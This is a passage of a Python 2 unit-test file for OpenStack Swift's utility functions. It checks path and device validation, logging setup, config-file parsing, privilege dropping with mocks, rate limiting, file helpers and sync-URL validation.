self.assertEquals(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEquals(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEquals(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEquals(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
# Test swift.common.utils.validate_device_partition
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError as err:
self.assertEquals(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError as err:
self.assertEquals(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEquals(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo = utils.LoggerFileObject(logger)
print 'test1'
self.assertEquals(sio.getvalue(), '')
sys.stdout = lfo
print 'test2'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo
print >> sys.stderr, 'test4'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
sys.stdout = orig_stdout
print 'test5'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n')
print >> sys.stderr, 'test6'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
sys.stderr = orig_stderr
print 'test8'
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\n')
lfo.writelines(['a', 'b', 'c'])
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\n')
lfo.close()
lfo.write('d')
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo.flush()
self.assertEquals(sio.getvalue(), 'STDOUT: test2\nSTDOUT: test4\n'
'STDOUT: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assert_(got_exc)
got_exc = False
try:
for line in lfo.xreadlines():
pass
except Exception:
got_exc = True
self.assert_(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEquals(conf, conf_file)
# assert defaults
self.assertEquals(options['verbose'], False)
self.assert_('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEquals(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEquals(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEquals(options['verbose'], True)
self.assertEquals(options['once'], True)
self.assertEquals(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assert_('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assert_('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warn('test1')
self.assertEquals(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEquals(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEquals(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warn('test4')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEquals(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEquals(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEquals([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEquals(strip_value(sio), '')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\n')
self.assertEquals(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEquals(strip_value(sio), 'test\ntest\n')
self.assertEquals(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assert_('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('errno.ECONNREFUSED message test' not in log_msg)
self.assert_('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('my error message' not in log_msg)
self.assert_('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('ConnectionTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assert_('Traceback' not in log_msg)
self.assert_('MessageTimeout' in log_msg)
self.assert_('(42s)' in log_msg)
self.assert_('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assert_('Traceback' in log_msg)
self.assert_('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('txn' in log_msg)
self.assert_('12345' in log_msg)
# test no txn on info message
self.assertEquals(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('txn' not in log_msg)
self.assert_('12345' not in log_msg)
# test txn already in message
self.assertEquals(logger.txn_id, '12345')
logger.warn('test 12345 test')
self.assertEquals(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assert_('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assert_('my error message' in log_msg)
self.assert_('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assert_('client_ip' in log_msg)
self.assert_('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assert_('client_ip' not in log_msg)
self.assert_('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEquals(logger.client_ip, '1.2.3.4')
logger.warn('test 1.2.3.4 test 12345')
self.assertEquals(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
reset_loggers()
def test_storage_directory(self):
self.assertEquals(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_whataremyips(self):
myips = utils.whataremyips()
self.assert_(len(myips) > 1)
self.assert_('127.0.0.1' in myips)
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with nested(
patch('netifaces.interfaces', my_interfaces),
patch('netifaces.ifaddresses', my_ifaddress_error)):
self.assertEquals(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with nested(
patch('netifaces.interfaces', my_ipv6_interfaces),
patch('netifaces.ifaddresses', my_ipv6_ifaddresses)):
myips = utils.whataremyips()
self.assertEquals(len(myips), 1)
self.assertEquals(myips[0], test_ipv6_address)
def test_hash_path(self):
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
# Yes, these tests are deliberately very fragile. We want to make sure
# that if someones changes the results hash_path produces, they know it
try:
self.assertEquals(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEquals(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEquals(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEquals(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
finally:
utils.HASH_PATH_PREFIX = _prefix
def test_load_libc_function(self):
self.assert_(callable(
utils.load_libc_function('printf')))
self.assert_(callable(
utils.load_libc_function('some_not_real_function')))
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEquals(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEquals(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEquals(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEquals(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEquals(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
import pwd
self.assertEquals(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assert_(utils.os.called_funcs[func])
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds)
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assert_(utils.sys.excepthook is not None)
self.assertEquals(utils.os.closed_fds, [])
self.assert_(isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assert_(isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assert_(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEquals(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
reset_loggers()
finally:
utils.sys = _orig_sys
utils.os = _orig_os
def test_get_logger_console(self):
reset_loggers()
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assert_(console_handlers)
# make sure you can't have two console handlers
self.assertEquals(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEquals(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEquals(new_handler, old_handler)
reset_loggers()
def test_ratelimit_sleep(self):
running_time = 0
start = time.time()
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.assertTrue(abs((time.time() - start) * 100) < 1)
running_time = 0
start = time.time()
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(25 - (time.time() - start) * 100) < 10)
def test_ratelimit_sleep_with_incr(self):
running_time = 0
start = time.time()
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 250 (with no -1)
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertTrue(abs(50 - (time.time() - start) * 100) < 10)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEquals(parsed.scheme, 'http')
self.assertEquals(parsed.hostname, '127.0.0.1')
self.assertEquals(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEquals(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEquals(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEquals(parsed.hostname, '::1')
self.assertEquals(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEquals(parsed.hostname, '')
def test_ratelimit_sleep_with_sleep(self):
running_time = 0
start = time.time()
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
# make sure it's accurate to 10th of a second
self.assertTrue(abs(100 - (time.time() - start) * 100) < 10)
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEquals(len(asdf), 1)
self.assertEquals(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEquals(len(app_bins), 2)
self.assertEquals(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEquals(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEquals(len(sub_ini), 1)
self.assertEquals(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEquals(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assert_(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEquals(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assert_(conf_dir in conf_dirs)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEquals(os.path.exists(file_name), False)
self.assertEquals(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assert_(os.path.exists(file_name))
self.assertEquals(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEquals(utils.human_readable(0), '0')
self.assertEquals(utils.human_readable(1), '1')
self.assertEquals(utils.human_readable(10), '10')
self.assertEquals(utils.human_readable(100), '100')
self.assertEquals(utils.human_readable(999), '999')
self.assertEquals(utils.human_readable(1024), '1Ki')
self.assertEquals(utils.human_readable(1535), '1Ki')
self.assertEquals(utils.human_readable(1536), '2Ki')
self.assertEquals(utils.human_readable(1047552), '1023Ki')
self.assertEquals(utils.human_readable(1048063), '1023Ki')
self.assertEquals(utils.human_readable(1048064), '1Mi')
self.assertEquals(utils.human_readable(1048576), '1Mi')
self.assertEquals(utils.human_readable(1073741824), '1Gi')
self.assertEquals(utils.human_readable(1099511627776), '1Ti')
self.assertEquals(utils.human_readable(1125899906842624), '1Pi')
self.assertEquals(utils.human_readable(1152921504606846976), '1Ei')
self.assertEquals(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEquals(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEquals(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
for goodurl in ('http://1.1.1.1/v1/a/c/o',
'http://1.1.1.1:8080/a/c/o',
'http://2.2.2.2/a/c/o',
'https://1.1.1.1/v1/a/c/o',
''):
self.assertEquals(utils.validate_sync_to(goodurl,
['1.1.1.1', '2.2.2.2']),
None)
for badurl in ('http://1.1.1.1',
'httpq://1.1.1.1/v1/a/c/o',
'http://1.1.1.1/v1/a/c/o?query',
'http://1.1.1.1/v1/a/c/o#frag',
'http://1.1.1.1/v1/a/c/o?query#frag',
'http://1.1.1.1/v1/a/c/o?query=param',
'http://1.1.1.1/v1/a/c/o?query=param#frag',
'http://1.1.1.2/v1/a/c/o'):
self.assertNotEquals(
utils.validate_sync_to(badurl, ['1.1.1.1', '2.2.2.2']),
None)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEquals(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEquals(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n)) for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
